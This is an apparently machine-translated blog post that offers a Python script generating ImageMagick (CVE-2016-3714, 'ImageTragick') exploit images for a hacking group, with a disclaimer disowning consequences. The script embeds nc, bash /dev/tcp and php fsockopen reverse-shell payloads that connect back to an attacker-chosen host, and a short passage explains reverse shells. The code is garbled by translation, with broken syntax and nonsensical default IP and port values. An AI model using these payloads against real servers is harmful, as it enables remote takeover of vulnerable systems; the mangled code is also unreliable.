ImageMagick vulnerability EXP simple script generation

ImageMagick vulnerability EXP simple generation script a few days ago saw the explosion of the ImageMagick remote execution vulnerability (CVE-2016-3714), so for Evil0x. COM core members to use, write a exp generated script for everyone to use. (Disclaimer: I don't care if something happens)

Generally, this script has three functions.

Generate a rebound for NC

Generate a bash bounce attack

Generate php Reflection

The server can use nc to listen and the shell will be rebounded. The generated Image extension exp.png can be freely changed to other image formats.

What is shell bounce?

Reverse shell, also known as shell bounce or shell reflection, means that the control side listens to a TCP/UDP port and the control side initiates a request to this port, and convert the input and output of the command line to the control end. The reverse shell corresponds to standard shells such as telnet and ssh. Essentially, the roles of clients and servers in the network concept are reversed. It is usually used when the controlled end is restricted by the firewall, has insufficient permissions, and has a port occupied.

Author: Mo Xuyou

Link: http://www.zhihu.com/question/24503813/answer/28088923

Source: Zhihu, slightly changed

Above, release the source code.

File download:

Imagemagic_exp.zip

#-*-Coding: UTF-8 -*-#! /Usr/bin/env python # imagemagic_exp.py import argparse class payload (object): "" building payload, you must input shell typle and server ip and port CVE-2016-3714-Insufficient shell characters filtering leads to (potentially remote) code execution Insufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats "def _ init _ (self, shelltype, ip, port): # super (_ paload, self ). _ init _ () self. shelltype = shelltype self. ip = ip self. port = port self. nc = 'NC-e/bin/sh' + self. ip + ''+ self. port self. bash = 'bash-I> &/dev/tcp/'+ self. ip + '/' + self. port + '0> % 1' self. php = "php-R' $ sock = fsockopen (% s, % s ); exec (\ "/bin/sh-I <& 3> & 3 2> & 3 \"); '"% (self. ip, self. port) self. shell_dict = {'NC ': self. nc, 'Bash': self. bash, 'php': self. php} def payloadbuild (self): "" push graphic-context viewbox 0 0 640 480 fill 'url ( https://example.com/image.jpg "| Bash-I> &/dev/tcp/127.0.0.1/2333 0> & 1") 'pop graphic-context "if self. shelltype = 'NC ': self. shell = self. shell_dict ['NC '] if self. shelltype = 'Bash': self. shell = self. shell_dict ['Bash'] if self. shelltype = 'php': self. shell = self. shell_dict ['php'] self. shellcode = "fill 'url ( https://example.com/image.jpg \ "|" + Self. shell + "\") \ '"payload = [] payload. append ('push graphic-context') payload. append ('viewbox 0 0 640 480 ') payload. append (self. shellcode) payload. append ('pop graphic-context') return payload # touch a jpg image def newimage (self): with open('exp.jpg ', 'w') as file: for item in self. payloadbuild (): file. write (item + '\ n') if _ name __= =' _ main _ ': parse = argparse. argumentParser () parse. add_argument ("-- nc", help = "generate images with executable nc reflection", action = "store_true") parse. add_argument ("-- bash", help = "generate an image that can execute bash reflection", action = "store_true") parse. add_argument ("-- php", help = "generate an executable php shot Image", action = "store_true") parse. add_argument ("-- ip", help = "reverse shell ip", default = '2017. 0.0.1 ') parse. add_argument ("-- port", help = "rebound shell port", default = '000000') args = parse. parse_args () if args. nc: test = payload ('NC ', args. ip, args. port) test. newimage () if args. bash: test = payload ('Bash', args. ip, args. port) test. newimage () if args. php: test = payload ('php', args. ip, args. port) test. newimage ()